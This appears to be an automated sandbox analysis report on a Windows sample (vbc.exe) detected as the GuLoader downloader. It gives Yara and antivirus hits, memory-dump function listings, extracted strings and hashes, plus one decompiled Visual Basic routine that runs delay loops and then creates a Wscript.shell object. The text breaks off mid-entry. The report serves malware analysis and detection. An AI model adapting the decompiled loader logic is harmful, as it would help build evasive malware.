Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 984 Parent PID: 2644 vbc.exeCOMMON

Executed Functions

Function 003669E3, Relevance: 1.7, APIs: 1, Instructions: 163memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-D7CD1C36), ref: 00366BC6

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 4dfcf057032ff063f3b218f1eee21daca34b8a4f91f8adebb4bbf4d60aa1744e
Instruction ID: 5dbea8c0b011d1f729b46cd967ab88967f1b2e461c38edab0bd81e7e389334ac
Opcode Fuzzy Hash: 4dfcf057032ff063f3b218f1eee21daca34b8a4f91f8adebb4bbf4d60aa1744e
Instruction Fuzzy Hash: 915146B66042459FCB619F78DC527E97BB1EF15394F640519EC88CB655E331C980CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00366A43, Relevance: 1.6, APIs: 1, Instructions: 129memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-D7CD1C36), ref: 00366BC6

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6dbdfc4be50546871851ae761b451c607f773f02ab0f86d2b438f810a4f56b83
Instruction ID: 47ee68ba43a11a82d634aca9d00b2ff3975bb3d1a8cdf4360a95d6e01da90738
Opcode Fuzzy Hash: 6dbdfc4be50546871851ae761b451c607f773f02ab0f86d2b438f810a4f56b83
Instruction Fuzzy Hash: 1D4125B66082459BCB619F78DC52BED7BF1EF06394F240119ED88CB655E3319A80CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00366B38, Relevance: 1.6, APIs: 1, Instructions: 99memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-D7CD1C36), ref: 00366BC6

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fc9985b46b07df82dd74008ce0c51cf2f84567a8ce5c12dd59f06f226caafd5e
Instruction ID: cdc1cb0875edcb573c1ed6da3d549c7f51cd7b7a9d03f631f2d6faefd4d42c12
Opcode Fuzzy Hash: fc9985b46b07df82dd74008ce0c51cf2f84567a8ce5c12dd59f06f226caafd5e
Instruction Fuzzy Hash: 4C31D8B66002859BCB219F68DC92AD83BB1EF46394F640211ED4CDB655F232D950CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 00419564, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00419564(void* __ebx, void* __edi, void* __esi, long long __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				intOrPtr* _v48;
				char _v52;
				char _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				short _v80;
				signed int _v84;
				char _v100;
				signed int _t66;
				intOrPtr _t68;
				char* _t75;
				signed int _t79;
				char* _t81;
				char* _t82;
				void* _t83;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				void* _t94;
				void* _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				long long _t104;

				_t104 = __fp0;
				_t90 = __esi;
				_t89 = __edi;
				_t83 = __ebx;
				_t94 = _t96;
				_t97 = _t96 - 0xc;
				 *[fs:0x0] = _t97;
				L004011C0();
				_v16 = _t97;
				_v12 = 0x401130;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4011c6, _t93);
				_t66 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v60 = _t66;
				if(_v60 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x402d14);
					_push(_a4);
					_push(_v60);
					L00401352();
					_v72 = _t66;
				}
				_v32 = 0x30bc82c;
				asm("fild dword [ebp-0x1c]");
				_v80 = _t104;
				if( *0x41c000 != 0) {
					_push( *0x40112c);
					_push( *0x401128);
					L004011E4();
				}
				L0040134C();
				_v32 = _t66;
				while(1) {
					_t68 = _v28 + 1;
					if(_t68 < 0) {
						break;
					}
					_v28 = _t68;
					_t79 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v56);
					_v60 = _t79;
					if(_v60 >= 0) {
						_v84 = _v84 & 0x00000000;
					} else {
						_push(0x6f8);
						_push(0x402d44);
						_push(_a4);
						_push(_v60);
						L00401352();
						_v84 = _t79;
					}
					if(_v28 >= 0x1e8480) {
						_push(0);
						_push(L"Wscript.shell");
						_push( &_v52); // executed
						L0040133A(); // executed
						_t81 =  &_v52;
						_push(_t81);
						L00401340();
						_push(_t81);
						_t82 =  &_v36;
						_push(_t82);
						L00401346();
						L00401334();
						_v32 = 0xc0177;
						_t91 = 0;
						do {
							_t91 = _t91 + 1;
						} while (_t91 != 0x36fee1);
						_push(_t83);
						_push(_t82);
						_push(_t91 + 0x9fc78);
						return _t82;
					} else {
						continue;
					}
					L19:
				}
				L00401328();
				_t98 = _t97 - 0xc;
				 *[fs:0x0] = _t98;
				L004011C0();
				_v68 = _t98;
				_v64 = 0x401140;
				_v60 = 0;
				 *((intOrPtr*)( *_v48 + 4))(_v48, _t89, _t90, _t83, 0x20,  *[fs:0x0], 0x4011c6, _t94);
				_push(L"4:4:4");
				_push( &_v100); // executed
				L00401316(); // executed
				_t75 =  &_v100;
				_push(_t75);
				L0040131C();
				L00401322();
				L00401334();
				_v80 = 0x321d;
				_push(0x419772);
				L00401310();
				return _t75;
				goto L19;
			}

0x00419564
0x00419564
0x00419564
0x00419564
0x00419565
0x00419567
0x00419576
0x00419580
0x00419588
0x0041958b
0x00419598
0x004195a1
0x004195ac
0x004195b7
0x004195bd
0x004195bf
0x004195c6
0x004195e2
0x004195c8
0x004195c8
0x004195cd
0x004195d2
0x004195d5
0x004195d8
0x004195dd
0x004195dd
0x004195e6
0x004195ed
0x004195f0
0x004195fd
0x00419607
0x0041960d
0x00419613
0x00419613
0x00419618
0x0041961d
0x00419620
0x00419623
0x00419626
0x00000000
0x00000000
0x0041962c
0x0041963b
0x00419641
0x00419648
0x00419664
0x0041964a
0x0041964a
0x0041964f
0x00419654
0x00419657
0x0041965a
0x0041965f
0x0041965f
0x0041966f
0x00419673
0x00419675
0x0041967d
0x0041967e
0x00419683
0x00419686
0x00419687
0x0041968c
0x0041968d
0x00419690
0x00419691
0x00419699
0x0041969e
0x004196a5
0x004196a7
0x004196a7
0x004196a8
0x004196b6
0x004196b7
0x004196b8
0x004196b9
0x00419671
0x00000000
0x00419671
0x00000000
0x0041966f
0x004196e5
0x004196ed
0x004196fc
0x00419706
0x0041970e
0x00419711
0x00419718
0x00419727
0x0041972a
0x00419732
0x00419733
0x00419738
0x0041973b
0x0041973c
0x00419746
0x0041974e
0x00419753
0x00419759
0x0041976c
0x00419771
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011C6), ref: 00419580
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,00402D14,000002B4), ref: 004195D8
_adj_fdiv_m64.MSVBVM60 ref: 00419613
__vbaFpI4.MSVBVM60 ref: 00419618
__vbaHresultCheckObj.MSVBVM60(00000000,00401130,00402D44,000006F8), ref: 0041965A
#716.MSVBVM60(?,Wscript.shell,00000000), ref: 0041967E
__vbaObjVar.MSVBVM60(?,?,Wscript.shell,00000000), ref: 00419687
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419691
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Wscript.shell,00000000), ref: 00419699

Strings

4:4:4, xrefs: 0041972A
Wscript.shell, xrefs: 00419675

Memory Dump Source

Source File: 00000006.00000002.684240905.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.684232870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.684280739.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684292158.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684299733.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$#716AddrefChkstkFree_adj_fdiv_m64
String ID: 4:4:4$Wscript.shell
API String ID: 2947573536-1552047234
Opcode ID: e873cf6853df362ab261431b32a53c3a76e93b5da5773c142200f5b722787993
Instruction ID: 647e2ace2b69d4f9673b897fb2b2e449cf9c5c647e2d9c178d3596be3515caf3
Opcode Fuzzy Hash: e873cf6853df362ab261431b32a53c3a76e93b5da5773c142200f5b722787993
Instruction Fuzzy Hash: 76512C71940208EFDB00EFA5D985BDEBBB4FF08754F10803AF505BA1A1C7799991CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401370, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6%*), ref: 00401375

Strings

VB5!6%*, xrefs: 00401370
;, xrefs: 00401392

Memory Dump Source

Source File: 00000006.00000002.684240905.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.684232870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.684280739.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684292158.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.684299733.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: ;$VB5!6%*
API String ID: 1341478452-1462054489
Opcode ID: 9531798006964550e361d827aeda21cead5a07bda706ca30d700e2b98241dd35
Instruction ID: 91b0c4add59c2e0ce07a45b454b1da4c15c162fda05843ce508412d2b75bdcf1
Opcode Fuzzy Hash: 9531798006964550e361d827aeda21cead5a07bda706ca30d700e2b98241dd35
Instruction Fuzzy Hash: 185126B048E7C45FD3078B719CA55A23F78DE5326430A46DBD8C2CA4A3C21C595BD7A3

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003623DA, Relevance: 12.0, Strings: 9, Instructions: 712COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E
K5!, xrefs: 00365239

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$K5!$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-2993053068
Opcode ID: 63d7343b081822cdb80a628dff15acc327865c7455f9d1fcd9a4cddd10174e44
Instruction ID: f5ae712f1cbb36f8e0d14c1030377b0fa5ddaf820d702c76dfb4f452f467586e
Opcode Fuzzy Hash: 63d7343b081822cdb80a628dff15acc327865c7455f9d1fcd9a4cddd10174e44
Instruction Fuzzy Hash: 0B62EBB2604349DFDB759F35CC957EABBB2BF55300F558129EC8A9B224D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0036938A, Relevance: 11.9, Strings: 9, Instructions: 694COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E
K5!, xrefs: 00365239

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$K5!$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-2993053068
Opcode ID: 9229b2e6c5ac12225bb69f10c9c8f2102b615aff8189002657da82bc21cd07ec
Instruction ID: 4b493ec1eeac9c3d36f93c587278f360cff2db612bb7a23828e5fbcfe9cb115c
Opcode Fuzzy Hash: 9229b2e6c5ac12225bb69f10c9c8f2102b615aff8189002657da82bc21cd07ec
Instruction Fuzzy Hash: AB52CBB2604349DFDB758F35CC957EABBB2BF59300F558129EC899B214D3309A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00362BBC, Relevance: 11.9, Strings: 9, Instructions: 692COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E
K5!, xrefs: 00365239

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$K5!$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-2993053068
Opcode ID: 54a1b6487750c8be8bb0b44330b302b90695e687a2cf1663b8e2e3a5939a1f3c
Instruction ID: c40ae3101bc324a9639215ee6d006624a9529fb7184a658f71cb787ea33193ab
Opcode Fuzzy Hash: 54a1b6487750c8be8bb0b44330b302b90695e687a2cf1663b8e2e3a5939a1f3c
Instruction Fuzzy Hash: A552CBB2604349DFDB758F35CC55BEABBB2BF59340F558129EC8A9B214D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0036510B, Relevance: 11.9, Strings: 9, Instructions: 651COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E
K5!, xrefs: 00365239

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$K5!$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-2993053068
Opcode ID: b63dce0731c02b467a07bb816da87fc9d8c54f6197f0ed9ba8d5fbf88a700d2d
Instruction ID: 8329a086444ba4faf738e74f859fe849c4acb7bc8e6fa22ef0c0978f36638653
Opcode Fuzzy Hash: b63dce0731c02b467a07bb816da87fc9d8c54f6197f0ed9ba8d5fbf88a700d2d
Instruction Fuzzy Hash: 5A52FDB2604349DFCB659F34CC95BEABBB2FF55340F558129EC899B224D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00365067, Relevance: 11.9, Strings: 9, Instructions: 640COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E
K5!, xrefs: 00365239

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$K5!$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-2993053068
Opcode ID: 3be7ea3273d38b3ea4e0b9b792416c36779b129fb038ca61f1a462f3441b80ac
Instruction ID: ca97b247b6e09a9aacecac46a0cfbafe2eeeecb8a2986e4b69c42b08f1273f07
Opcode Fuzzy Hash: 3be7ea3273d38b3ea4e0b9b792416c36779b129fb038ca61f1a462f3441b80ac
Instruction Fuzzy Hash: A252CAB2604349DFDB759F35C895BEABBB2FF59300F558129EC899B214D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003651ED, Relevance: 11.9, Strings: 9, Instructions: 612COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E
K5!, xrefs: 00365239

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$K5!$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-2993053068
Opcode ID: d28c7e9ee38e5998e7869f07895344803db673ca5c90f20351e4b2913a2b94f7
Instruction ID: b600ff7911335b86971fa15c6f115cdf7e6046d980c21b88d7151d98b295ed05
Opcode Fuzzy Hash: d28c7e9ee38e5998e7869f07895344803db673ca5c90f20351e4b2913a2b94f7
Instruction Fuzzy Hash: AC42ECB2604349DFCB659F38CC95BEABBB2FF55340F558129EC899B215D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003652D1, Relevance: 10.6, Strings: 8, Instructions: 593COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-3246345238
Opcode ID: 8e344594cc43ef77a422e030386e1bee59e437658fd243ae6a5d12319c58456f
Instruction ID: 962e772e7348fc9f31bc02654c19743ef1c2ed29465e25e53ea51ed116c2a591
Opcode Fuzzy Hash: 8e344594cc43ef77a422e030386e1bee59e437658fd243ae6a5d12319c58456f
Instruction Fuzzy Hash: 0432FCB2604349DFCB759F28CC95BEABBB2FF55340F558129EC899B215D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003653C3, Relevance: 10.5, Strings: 8, Instructions: 547COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
7, xrefs: 00365464
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$]wt@$hBq$pZ=j$ 7$!5$eR$r1
API String ID: 0-3246345238
Opcode ID: 87abbf5337c8cfdbe840fb8442ecc7f7954b3d8be1952393a642af3ee3f9bd65
Instruction ID: d40ccb5059eb119f68292d3cadfd7a8658b348e59f8f90bef34b677a527c7c4c
Opcode Fuzzy Hash: 87abbf5337c8cfdbe840fb8442ecc7f7954b3d8be1952393a642af3ee3f9bd65
Instruction Fuzzy Hash: 2F32ECB2604349DFCB659F34CC96BEABBB2FF15350F558129EC899B215D3319A80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003654F8, Relevance: 9.3, Strings: 7, Instructions: 533COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$]wt@$hBq$pZ=j$!5$eR$r1
API String ID: 0-1507867706
Opcode ID: b8bf0f05652f3df692029ce0bb5e27948254028fa1198da6b321d9b1b13daf25
Instruction ID: e60faa75e4beee4a05e3c544037db2888b53b737989fa0c205ab8185e31234e1
Opcode Fuzzy Hash: b8bf0f05652f3df692029ce0bb5e27948254028fa1198da6b321d9b1b13daf25
Instruction Fuzzy Hash: FD220EB2604389DFCB659F34CCA5BEABBB2FF15340F51412DE8898B215D3319A84CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00365485, Relevance: 9.3, Strings: 7, Instructions: 502COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
!5, xrefs: 003655CC
#JDd, xrefs: 00365E59
eR, xrefs: 00366153
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$]wt@$hBq$pZ=j$!5$eR$r1
API String ID: 0-1507867706
Opcode ID: 8b1214c95954d4357b831bd1f35fb1effb15448bb81fcd74b78c9acb94aee2e6
Instruction ID: 6da967b74b411bade55fc375274a6fee65a1e015f5f50b9f7c849e1ac646ba74
Opcode Fuzzy Hash: 8b1214c95954d4357b831bd1f35fb1effb15448bb81fcd74b78c9acb94aee2e6
Instruction Fuzzy Hash: 5922EDB2604349DFDB659F38CC957EABBB2FF15340F45812EE8899B215D3309A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003655D3, Relevance: 8.0, Strings: 6, Instructions: 480COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
eR, xrefs: 00366153
#JDd, xrefs: 00365E59
]wt@, xrefs: 00365698
pZ=j, xrefs: 003656FF
hBq, xrefs: 0036565E

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$]wt@$hBq$pZ=j$eR$r1
API String ID: 0-156154965
Opcode ID: ff6a4416e89059d0c4bba6ffb63a5e363c8dd441c5c13aea8446675c35a37db6
Instruction ID: 5d2de68489caf79792ac0ff199224c790c6b7fa34bfc23f19041082474503325
Opcode Fuzzy Hash: ff6a4416e89059d0c4bba6ffb63a5e363c8dd441c5c13aea8446675c35a37db6
Instruction Fuzzy Hash: B012EEB2604349DFCB659F34CC95BEABBB2FF15340F55412EE8899B215D3319A80CB82

Uniqueness

Uniqueness Score: -1.00%

Function 003636BB, Relevance: 5.6, Strings: 4, Instructions: 584COMMON

Download Yara Rule

Strings

y.Of, xrefs: 00363B76
z1h, xrefs: 0036430C
b;7, xrefs: 003637BB
b;7, xrefs: 003637C0

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: b;7$b;7$y.Of$z1h
API String ID: 0-820923154
Opcode ID: 1d2e8520e507bb48c6dcf4f101f6f5bd9881d72679efe7f706e4a7a3febf4dac
Instruction ID: 0823900ce82100f465eb31722a77127dc693b55bc6249dc5cbddc6d5b5cde9e8
Opcode Fuzzy Hash: 1d2e8520e507bb48c6dcf4f101f6f5bd9881d72679efe7f706e4a7a3febf4dac
Instruction Fuzzy Hash: AE32BB72B047499FDB28DF28CC84BDAB7A5FF58310F15822AEC4D9B705D730AA518B90

Uniqueness

Uniqueness Score: -1.00%

Function 003656BF, Relevance: 5.4, Strings: 4, Instructions: 441COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
eR, xrefs: 00366153
#JDd, xrefs: 00365E59
pZ=j, xrefs: 003656FF

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$pZ=j$eR$r1
API String ID: 0-1936917165
Opcode ID: ec05c93dbb6d2a0b8dae8ca88506714b93a844304f1602f955f88c799cc66b74
Instruction ID: bcfcb04c4c2b17b503e81ed259a402d6bcb375fe8c3763a45cc06f439db55286
Opcode Fuzzy Hash: ec05c93dbb6d2a0b8dae8ca88506714b93a844304f1602f955f88c799cc66b74
Instruction Fuzzy Hash: 8A02EDB2604389DFCB759F28DCA5BEA77B2BF15340F55402EEC899B215D3319A84CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0036A32B, Relevance: 4.3, Strings: 3, Instructions: 519COMMON

Download Yara Rule

Strings

O9uW, xrefs: 0036AD5D
Q^, xrefs: 0036AA8D
{#, xrefs: 0036AA02

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: O9uW${#$Q^
API String ID: 0-1990099600
Opcode ID: 66afe9e9070edea789138d82f9a766d712d483d329e653c040ae1db2513c5ef8
Instruction ID: 296c35d0748c10af4cb01201481d7ac7989ac4652ac6fc21382827da15091e8a
Opcode Fuzzy Hash: 66afe9e9070edea789138d82f9a766d712d483d329e653c040ae1db2513c5ef8
Instruction Fuzzy Hash: B332F9715087C58FDB72DF38C8987DA7BE1AF12320F45C19AC8998F29AD7348641CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00365789, Relevance: 4.2, Strings: 3, Instructions: 410COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
eR, xrefs: 00366153
#JDd, xrefs: 00365E59

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$eR$r1
API String ID: 0-1584620453
Opcode ID: 54a4a6b9e09286044e87ea5f09129017b6429243e9c41dd5f746a30d7f4e01eb
Instruction ID: 43e67a3acaa1d706ebe71d4a415b9a99df118a5578c53e914e53db678806098d
Opcode Fuzzy Hash: 54a4a6b9e09286044e87ea5f09129017b6429243e9c41dd5f746a30d7f4e01eb
Instruction Fuzzy Hash: DFF1EBB2604389DFCF759F28CCA5BEA77B2AF15340F55402AEC89DB215D3719A84CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00363710, Relevance: 4.1, Strings: 3, Instructions: 392COMMON

Download Yara Rule

Strings

y.Of, xrefs: 00363B76
b;7, xrefs: 003637BB
b;7, xrefs: 003637C0

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: b;7$b;7$y.Of
API String ID: 0-593152429
Opcode ID: b2708a38c09019726743432b0c244e378e26e8780a8ee58d986ed6f09c6f0cd5
Instruction ID: e740aa10a1e703dd568476fdabe50ae09d80ae4d6d55e2083cf621a5f4e83f36
Opcode Fuzzy Hash: b2708a38c09019726743432b0c244e378e26e8780a8ee58d986ed6f09c6f0cd5
Instruction Fuzzy Hash: 2FF1CC72A0078A9FDB24DF28DC84BDAB7B1BF48350F558229EC5C9B705D770AA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0036586D, Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
eR, xrefs: 00366153
#JDd, xrefs: 00365E59

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$eR$r1
API String ID: 0-1584620453
Opcode ID: 2517c592ee3a6b4569054c2ecf90d7504824790db79d59cc02cb751d24275479
Instruction ID: c641c52d42bd4c620b89c476a896995317b84f9c97c28028bbf3a498b72ae3f3
Opcode Fuzzy Hash: 2517c592ee3a6b4569054c2ecf90d7504824790db79d59cc02cb751d24275479
Instruction Fuzzy Hash: D7F1EDB2604389DFCF759F28CCA5BEA77B2AF15350F51402AEC89DB215D3319A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0036595D, Relevance: 4.1, Strings: 3, Instructions: 347COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
eR, xrefs: 00366153
#JDd, xrefs: 00365E59

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$eR$r1
API String ID: 0-1584620453
Opcode ID: fc7e95fc5655670fad2b592ff5f414fd9c7ddfb873b7ef27324896b58c47981c
Instruction ID: d650660453a0ebe8211f1f96ff22161520effefcff9169025c6dae321ee49d81
Opcode Fuzzy Hash: fc7e95fc5655670fad2b592ff5f414fd9c7ddfb873b7ef27324896b58c47981c
Instruction Fuzzy Hash: D4E1DDB26043899FCF759F28DCA5BEA77B2BF15340F51402AEC89DB215E3319A94CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00365A3F, Relevance: 4.1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

Strings

r1, xrefs: 00365E90
eR, xrefs: 00366153
#JDd, xrefs: 00365E59

Memory Dump Source

Source File: 00000006.00000002.684140178.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #JDd$eR$r1
API String ID: 0-1584620453
Opcode ID: 016ef2b9bfd44e083c5b59abad404751e8d964968e3b300fd4e103a9a78ee1d0
Instruction ID: c907ca0bfec86e246994e43fb2f23c8677ced23618d3f7077c83ab21f3fb4ded
Opcode Fuzzy Hash: 016ef2b9bfd44e083c5b59abad404751e8d964968e3b300fd4e103a9a78ee1d0
Instruction Fuzzy Hash: 22C1EFB26003499FCF759F28CCA5BEA77B2BF15340F51402AEC49DB365E3319A948B41

Uniqueness

Uniqueness Score: -1.00%

Function 00364336, Relevance: 4.0, Strings: 3, Instructions: 288COMMON

Download Yara Rule

Strings

